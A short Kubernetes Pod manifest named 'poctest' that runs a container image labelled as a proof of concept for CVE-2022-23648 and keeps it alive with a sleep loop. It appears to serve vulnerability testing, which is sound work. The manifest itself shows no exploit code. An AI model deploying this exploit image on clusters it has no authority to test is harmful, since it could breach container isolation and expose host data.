apiVersion: v1
kind: Pod
metadata:
  name: poctest
spec:
  containers:
    - name: poctest 
      image: ghcr.io/raesene/cve-2022-23648-poc:v1 
      command: ["/bin/bash", "-c", "--"]
      args: [ "while true; do sleep 30; done" ]
